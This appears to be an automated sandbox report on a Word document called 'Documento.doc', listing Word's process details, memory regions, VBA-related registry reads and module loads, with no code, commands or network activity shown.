6dd9d1ae591aa1c238d27b7d29b4d16775e02350637efc7659a7de6b062aa9d7 (SHA256)
Documento.doc
Word Document
Created at 2018-11-24 01:38:00
Notifications (1/1)
The operating system was rebooted during the analysis.
Monitored Processes
Behavior Information - Grouped by Category
Process #1: winword.exe
244
0
| Information | Value |
|---|---|
| ID | #1 |
| File Name | c:\program files\microsoft office\root\office16\winword.exe |
| Command Line | "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n |
| Initial Working Directory | C:\Users\aETAdzjz\Desktop\ |
| Monitor | Start Time: 00:00:48, Reason: Analysis Target |
| Unmonitor | End Time: 00:03:40, Reason: Self Terminated |
| Monitor Duration | 00:02:52 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x89c |
| Parent PID | 0x39c (c:\windows\explorer.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
9E0
0x
94C
0x
924
0x
920
0x
91C
0x
918
0x
8FC
0x
8F8
0x
8F4
0x
8F0
0x
8EC
0x
8E8
0x
8E4
0x
8E0
0x
8DC
0x
8D8
0x
8D4
0x
8B4
0x
8B0
0x
8AC
0x
8A8
0x
8A4
0x
8A0
0x
A78
0x
A7C
0x
B3C
0x
920
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x00020fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00043fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000050000 | 0x00050000 | 0x00050fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000060000 | 0x00060000 | 0x00060fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000070000 | 0x00070000 | 0x00070fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000080000 | 0x00080000 | 0x00086fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000090000 | 0x00090000 | 0x0018ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000190000 | 0x00190000 | 0x00191fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000001a0000 | 0x001a0000 | 0x001a0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000001b0000 | 0x001b0000 | 0x001b0fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000001c0000 | 0x001c0000 | 0x001c1fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000001d0000 | 0x001d0000 | 0x001d1fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000001e0000 | 0x001e0000 | 0x002dffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x002e0000 | 0x00346fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000350000 | 0x00350000 | 0x0044ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000450000 | 0x00450000 | 0x00452fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000460000 | 0x00460000 | 0x00461fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000470000 | 0x00470000 | 0x0047ffff | Private Memory | - |
|
|
|
- |
| pagefile_0x0000000000480000 | 0x00480000 | 0x00482fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000490000 | 0x00490000 | 0x00492fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000004a0000 | 0x004a0000 | 0x004affff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000004b0000 | 0x004b0000 | 0x00637fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000640000 | 0x00640000 | 0x007c0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000007d0000 | 0x007d0000 | 0x01bcffff | Pagefile Backed Memory | r |
|
|
|
- |
| sortdefault.nls | 0x01bd0000 | 0x01e9efff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000001ea0000 | 0x01ea0000 | 0x02292fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000022a0000 | 0x022a0000 | 0x0239ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000023a0000 | 0x023a0000 | 0x023a2fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000023b0000 | 0x023b0000 | 0x023b2fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000023c0000 | 0x023c0000 | 0x023c2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000023d0000 | 0x023d0000 | 0x0240ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002460000 | 0x02460000 | 0x0246ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002470000 | 0x02470000 | 0x0266ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000026a0000 | 0x026a0000 | 0x026a0fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000026b0000 | 0x026b0000 | 0x026b4fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x00000000026c0000 | 0x026c0000 | 0x026c0fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x00000000026d0000 | 0x026d0000 | 0x026d1fff | Pagefile Backed Memory | r |
|
|
|
- |
| index.dat | 0x026e0000 | 0x026ebfff | Memory Mapped File | rw |
|
|
|
- |
| private_0x00000000026f0000 | 0x026f0000 | 0x0276ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000002770000 | 0x02770000 | 0x0284efff | Pagefile Backed Memory | r |
|
|
|
- |
| index.dat | 0x02850000 | 0x02857fff | Memory Mapped File | rw |
|
|
|
- |
| index.dat | 0x02860000 | 0x0286ffff | Memory Mapped File | rw |
|
|
|
- |
| private_0x0000000002870000 | 0x02870000 | 0x0296ffff | Private Memory | rw |
|
|
|
- |
| kernelbase.dll.mui | 0x02970000 | 0x02a2ffff | Memory Mapped File | rw |
|
|
|
- |
| pagefile_0x0000000002a30000 | 0x02a30000 | 0x02a30fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000002a40000 | 0x02a40000 | 0x02a40fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000002a50000 | 0x02a50000 | 0x02b4ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002b50000 | 0x02b50000 | 0x02c4ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002cc0000 | 0x02cc0000 | 0x02cc0fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002cd0000 | 0x02cd0000 | 0x02cd0fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000002ce0000 | 0x02ce0000 | 0x02ce0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000002cf0000 | 0x02cf0000 | 0x02cf0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000002d00000 | 0x02d00000 | 0x02d01fff | Pagefile Backed Memory | r |
|
|
|
- |
| msxml6r.dll | 0x02d10000 | 0x02d10fff | Memory Mapped File | r |
|
|
|
- |
| {afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000017.db | 0x02d20000 | 0x02d3ffff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000002d40000 | 0x02d40000 | 0x02d40fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000002d50000 | 0x02d50000 | 0x02d5ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000002d60000 | 0x02d60000 | 0x02d61fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000002d70000 | 0x02d70000 | 0x02d70fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000002d90000 | 0x02d90000 | 0x02e0ffff | Private Memory | rw |
|
|
|
- |
| segoeui.ttf | 0x02e10000 | 0x02e8efff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000002e90000 | 0x02e90000 | 0x02f8ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002f90000 | 0x02f90000 | 0x0308ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000003090000 | 0x03090000 | 0x03091fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x00000000030a0000 | 0x030a0000 | 0x030a1fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000030b0000 | 0x030b0000 | 0x030b1fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000030c0000 | 0x030c0000 | 0x030c0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000030d0000 | 0x030d0000 | 0x031cffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000031d0000 | 0x031d0000 | 0x035cffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000035d0000 | 0x035d0000 | 0x036cffff | Private Memory | rw |
|
|
|
- |
| c_1255.nls | 0x036d0000 | 0x036e0fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000003700000 | 0x03700000 | 0x0370ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003730000 | 0x03730000 | 0x0382ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003840000 | 0x03840000 | 0x0393ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000039c0000 | 0x039c0000 | 0x03a3ffff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000003a40000 | 0x03a40000 | 0x03e3ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003ec0000 | 0x03ec0000 | 0x03fbffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004100000 | 0x04100000 | 0x041fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004210000 | 0x04210000 | 0x0428ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004290000 | 0x04290000 | 0x0438ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004390000 | 0x04390000 | 0x04b8ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000004b90000 | 0x04b90000 | 0x04ed2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004f80000 | 0x04f80000 | 0x04f8ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004f90000 | 0x04f90000 | 0x04f9ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004fa0000 | 0x04fa0000 | 0x0509ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000050d0000 | 0x050d0000 | 0x0514ffff | Private Memory | rw |
|
|
|
- |
| staticcache.dat | 0x05150000 | 0x05a7ffff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000005a80000 | 0x05a80000 | 0x05b7ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005be0000 | 0x05be0000 | 0x05beffff | Private Memory | rw |
|
|
|
- |
| tahoma.ttf | 0x05bf0000 | 0x05c9afff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000005ca0000 | 0x05ca0000 | 0x05d9ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005e90000 | 0x05e90000 | 0x05f8ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000006040000 | 0x06040000 | 0x0613ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000006150000 | 0x06150000 | 0x0624ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000006290000 | 0x06290000 | 0x0638ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000006490000 | 0x06490000 | 0x0650ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000065b0000 | 0x065b0000 | 0x066affff | Private Memory | rw |
|
|
|
- |
| private_0x0000000006740000 | 0x06740000 | 0x067bffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000067f0000 | 0x067f0000 | 0x068effff | Private Memory | rw |
|
|
|
- |
| private_0x00000000069e0000 | 0x069e0000 | 0x06adffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000006ae0000 | 0x06ae0000 | 0x072dffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000072e0000 | 0x072e0000 | 0x082dffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000008420000 | 0x08420000 | 0x0851ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000008670000 | 0x08670000 | 0x086effff | Private Memory | rw |
|
|
|
- |
| private_0x00000000086f0000 | 0x086f0000 | 0x08aeffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000008c10000 | 0x08c10000 | 0x08d0ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000008d10000 | 0x08d10000 | 0x09110fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000009120000 | 0x09120000 | 0x09520fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000009530000 | 0x09530000 | 0x09930fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000009940000 | 0x09940000 | 0x09b3ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000009b40000 | 0x09b40000 | 0x0ab40fff | Private Memory | rw |
|
|
|
- |
| private_0x000000000ab50000 | 0x0ab50000 | 0x0af4ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000037a30000 | 0x37a30000 | 0x37a3ffff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000037c80000 | 0x37c80000 | 0x37c8ffff | Private Memory | rwx |
|
|
|
- |
| osppc.dll | 0x751b0000 | 0x751e2fff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77a20000 | 0x77b19fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x77b20000 | 0x77c3efff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77c40000 | 0x77de8fff | Memory Mapped File | rwx |
|
|
|
- |
| psapi.dll | 0x77e00000 | 0x77e06fff | Memory Mapped File | rwx |
|
|
|
- |
| normaliz.dll | 0x77e10000 | 0x77e12fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| winword.exe | 0x13f4b0000 | 0x13f68bfff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x000007febdd50000 | 0x7febdd50000 | 0x7febdd5ffff | Private Memory | rwx |
|
|
|
- |
| private_0x000007febfb90000 | 0x7febfb90000 | 0x7febfb9ffff | Private Memory | rwx |
|
|
|
- |
| webservices.dll | 0x7fee4a90000 | 0x7fee4baefff | Memory Mapped File | rwx |
|
|
|
- |
| ivy.dll | 0x7fee4bb0000 | 0x7fee4e04fff | Memory Mapped File | rwx |
|
|
|
- |
| chart.dll | 0x7fee4e10000 | 0x7fee5be5fff | Memory Mapped File | rwx |
|
|
|
- |
| adal.dll | 0x7fee5bf0000 | 0x7fee5d09fff | Memory Mapped File | rwx |
|
|
|
- |
| msptls.dll | 0x7fee5d10000 | 0x7fee5e83fff | Memory Mapped File | rwx |
|
|
|
- |
| riched20.dll | 0x7fee5e90000 | 0x7fee612afff | Memory Mapped File | rwx |
|
|
|
- |
| mscoreei.dll | 0x7fee6260000 | 0x7fee62f8fff | Memory Mapped File | rwx |
|
|
|
- |
| mscoree.dll | 0x7fee6300000 | 0x7fee636efff | Memory Mapped File | rwx |
|
|
|
- |
| dwrite.dll | 0x7fee6370000 | 0x7fee64edfff | Memory Mapped File | rwx |
|
|
|
- |
| d3d10warp.dll | 0x7fee64f0000 | 0x7fee66bffff | Memory Mapped File | rwx |
|
|
|
- |
| msointl.dll | 0x7fee66c0000 | 0x7fee685cfff | Memory Mapped File | rwx |
|
|
|
- |
| wwintl.dll | 0x7fee6860000 | 0x7fee691ffff | Memory Mapped File | rwx |
|
|
|
- |
| msores.dll | 0x7fee6920000 | 0x7feead06fff | Memory Mapped File | rwx |
|
|
|
- |
| mso99lres.dll | 0x7feead10000 | 0x7feeba04fff | Memory Mapped File | rwx |
|
|
|
- |
| mso40uires.dll | 0x7feeba10000 | 0x7feebe4cfff | Memory Mapped File | rwx |
|
|
|
- |
| d2d1.dll | 0x7feebe50000 | 0x7feebf31fff | Memory Mapped File | rwx |
|
|
|
- |
| mso.dll | 0x7feebf40000 | 0x7feed96bfff | Memory Mapped File | rwx |
|
|
|
- |
| mso98win32client.dll | 0x7feed970000 | 0x7feee616fff | Memory Mapped File | rwx |
|
|
|
- |
| mso50win32client.dll | 0x7feee620000 | 0x7feee6aafff | Memory Mapped File | rwx |
|
|
|
- |
| mso40uiwin32client.dll | 0x7feee6b0000 | 0x7feef17efff | Memory Mapped File | rwx |
|
|
|
- |
| mso30win32client.dll | 0x7feef180000 | 0x7feef863fff | Memory Mapped File | rwx |
|
|
|
- |
| mso20win32client.dll | 0x7feef870000 | 0x7feefd12fff | Memory Mapped File | rwx |
|
|
|
- |
|
For performance reasons, the remaining 266 entries are omitted.
The remaining entries can be found in flog.txt. |
||||||||
Host Behavior
Registry (50)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create Key | HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\Licenses | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046} | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7 | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\409 | - |
|
2 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\9 | - |
|
2 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0 | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0\win64 | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0 | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib | - |
|
2 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046} | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0 | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0 | - |
|
2 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0\win64 | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8 | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0 | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0\win64 | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0 | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046} | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7 | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0 | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0\win64 | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0 | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common | - |
|
1 | |
| Read Value | HKEY_CLASSES_ROOT\Licenses\8804558B-B773-11d1-BC3E-0000F87552E7 | data = } |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common | value_name = RequireDeclaration, data = 15, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common | value_name = CompileOnDemand, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common | value_name = NotifyUserBeforeStateLoss, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common | value_name = BackGroundCompile, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common | value_name = BreakOnAllErrors, data = 255, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common | value_name = BreakOnServerErrors, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0\win64 | data = C:\Program Files\Microsoft Office\Root\Office16\MSWORD.OLB |
|
2 | |
| Read Value | HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0\win64 | data = C:\Windows\system32\stdole2.tlb |
|
1 | |
| Read Value | HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0\win64 | data = C:\Program Files\Common Files\Microsoft Shared\OFFICE16\MSO.DLL |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common | value_name = VbaCapability, data = 31 |
|
1 | |
| Enumerate Keys | HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046} | - |
|
1 | |
| Enumerate Keys | HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046} | - |
|
1 | |
| Enumerate Keys | HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046} | - |
|
1 | |
| Enumerate Keys | HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} | - |
|
1 | |
| Enumerate Keys | HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} | - |
|
1 | |
| Enumerate Keys | HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} | - |
|
1 | |
| Enumerate Keys | HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046} | - |
|
1 |
Module (143)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | Comctl32.dll | base_address = 0x7fefc690000 |
|
1 | |
| Load | C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBEUI.DLL | base_address = 0x7fee37b0000 |
|
1 | |
| Load | C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\1033\VBE7INTL.DLL | base_address = 0x7fef90e0000 |
|
1 | |
| Load | OLEAUT32.DLL | base_address = 0x7feffd80000 |
|
1 | |
| Load | VBE7.DLL | base_address = 0x7fee3f90000 |
|
4 | |
| Get Handle | c:\program files\microsoft office\root\office16\winword.exe | base_address = 0x13f4b0000 |
|
1 | |
| Get Handle | MSI.DLL | base_address = 0x7fefa750000 |
|
1 | |
| Get Handle | C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBEUI.DLL | base_address = 0x0 |
|
1 | |
| Get Handle | c:\windows\system32\user32.dll | base_address = 0x77a20000 |
|
1 | |
| Get Handle | oleaut32.dll | base_address = 0x7feffd80000 |
|
1 | |
| Get Filename | - | process_name = c:\program files\microsoft office\root\office16\winword.exe, file_name_orig = C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBE7.DLL, size = 260 |
|
3 | |
| Get Address | Unknown module name | function = MsiProvideQualifiedComponentA, address_out = 0x7fefa7d3b3c |
|
1 | |
| Get Address | Unknown module name | function = MsiGetProductCodeA, address_out = 0x7fefa7ca13c |
|
1 | |
| Get Address | Unknown module name | function = MsiReinstallFeatureA, address_out = 0x7fefa7d1618 |
|
1 | |
| Get Address | Unknown module name | function = MsiProvideComponentA, address_out = 0x7fefa7cf088 |
|
1 | |
| Get Address | Unknown module name | function = MsoVBADigSigCallDlg, address_out = 0x7fee38b72c0 |
|
1 | |
| Get Address | Unknown module name | function = MsoVbaInitSecurity, address_out = 0x7fee38260b0 |
|
1 | |
| Get Address | Unknown module name | function = MsoFIEPolicyAndVersion, address_out = 0x7fee37d1a60 |
|
1 | |
| Get Address | Unknown module name | function = MsoFAnsiCodePageSupportsLCID, address_out = 0x7fee3825f50 |
|
1 | |
| Get Address | Unknown module name | function = MsoFInitOffice, address_out = 0x7fee37cf000 |
|
1 | |
| Get Address | Unknown module name | function = MsoUninitOffice, address_out = 0x7fee37be860 |
|
1 | |
| Get Address | Unknown module name | function = MsoFGetFontSettings, address_out = 0x7fee37b3fc0 |
|
1 | |
| Get Address | Unknown module name | function = MsoRgchToRgwch, address_out = 0x7fee37c2380 |
|
1 | |
| Get Address | Unknown module name | function = MsoHrSimpleQueryInterface, address_out = 0x7fee37b7b80 |
|
1 | |
| Get Address | Unknown module name | function = MsoHrSimpleQueryInterface2, address_out = 0x7fee37b7b20 |
|
1 | |
| Get Address | Unknown module name | function = MsoFCreateControl, address_out = 0x7fee37b8730 |
|
1 | |
| Get Address | Unknown module name | function = MsoFLongLoad, address_out = 0x7fee38f3260 |
|
1 | |
| Get Address | Unknown module name | function = MsoFLongSave, address_out = 0x7fee38f3280 |
|
1 | |
| Get Address | Unknown module name | function = MsoFGetTooltips, address_out = 0x7fee37c1f40 |
|
1 | |
| Get Address | Unknown module name | function = MsoFSetTooltips, address_out = 0x7fee3826370 |
|
1 | |
| Get Address | Unknown module name | function = MsoFLoadToolbarSet, address_out = 0x7fee3814590 |
|
1 | |
| Get Address | Unknown module name | function = MsoFCreateToolbarSet, address_out = 0x7fee37b55b0 |
|
1 | |
| Get Address | Unknown module name | function = MsoHpalOffice, address_out = 0x7fee37c0240 |
|
1 | |
| Get Address | Unknown module name | function = MsoFWndProcNeeded, address_out = 0x7fee37b3d10 |
|
1 | |
| Get Address | Unknown module name | function = MsoFWndProc, address_out = 0x7fee37b6d30 |
|
1 | |
| Get Address | Unknown module name | function = MsoFCreateITFCHwnd, address_out = 0x7fee37b3d40 |
|
1 | |
| Get Address | Unknown module name | function = MsoDestroyITFC, address_out = 0x7fee37be6f0 |
|
1 | |
| Get Address | Unknown module name | function = MsoFPitbsFromHwndAndMsg, address_out = 0x7fee37bdf40 |
|
1 | |
| Get Address | Unknown module name | function = MsoFGetComponentManager, address_out = 0x7fee37b7bf0 |
|
1 | |
| Get Address | Unknown module name | function = MsoMultiByteToWideChar, address_out = 0x7fee37bfcd0 |
|
1 | |
| Get Address | Unknown module name | function = MsoWideCharToMultiByte, address_out = 0x7fee37b8b20 |
|
1 | |
| Get Address | Unknown module name | function = MsoHrRegisterAll, address_out = 0x7fee38b2ef0 |
|
1 | |
| Get Address | Unknown module name | function = MsoFSetComponentManager, address_out = 0x7fee37c42c0 |
|
1 | |
| Get Address | Unknown module name | function = MsoFCreateStdComponentManager, address_out = 0x7fee37b3e20 |
|
1 | |
| Get Address | Unknown module name | function = MsoFHandledMessageNeeded, address_out = 0x7fee37bab10 |
|
1 | |
| Get Address | Unknown module name | function = MsoPeekMessage, address_out = 0x7fee37ba7d0 |
|
1 | |
| Get Address | Unknown module name | function = MsoFCreateIPref, address_out = 0x7fee37b1550 |
|
1 | |
| Get Address | Unknown module name | function = MsoDestroyIPref, address_out = 0x7fee37be830 |
|
1 | |
| Get Address | Unknown module name | function = MsoChsFromLid, address_out = 0x7fee37b13d0 |
|
1 | |
| Get Address | Unknown module name | function = MsoCpgFromChs, address_out = 0x7fee37b6660 |
|
1 | |
| Get Address | Unknown module name | function = MsoSetLocale, address_out = 0x7fee37b1500 |
|
1 | |
| Get Address | Unknown module name | function = MsoFSetHMsoinstOfSdm, address_out = 0x7fee37b3dd0 |
|
1 | |
| Get Address | Unknown module name | function = MsoSetVbaInterfaces, address_out = 0x7fee38b71e0 |
|
1 | |
| Get Address | Unknown module name | function = MsoGetControlInstanceId, address_out = 0x7fee3886d10 |
|
1 | |
| Get Address | Unknown module name | function = VbeuiFIsEdpEnabled, address_out = 0x7fee38f98e0 |
|
1 | |
| Get Address | Unknown module name | function = VbeuiEnterpriseProtect, address_out = 0x7fee38f9830 |
|
1 | |
| Get Address | Unknown module name | function = SysFreeString, address_out = 0x7feffd81320 |
|
1 | |
| Get Address | Unknown module name | function = LoadTypeLib, address_out = 0x7feffd8f1e0 |
|
1 | |
| Get Address | Unknown module name | function = RegisterTypeLib, address_out = 0x7feffddcaa0 |
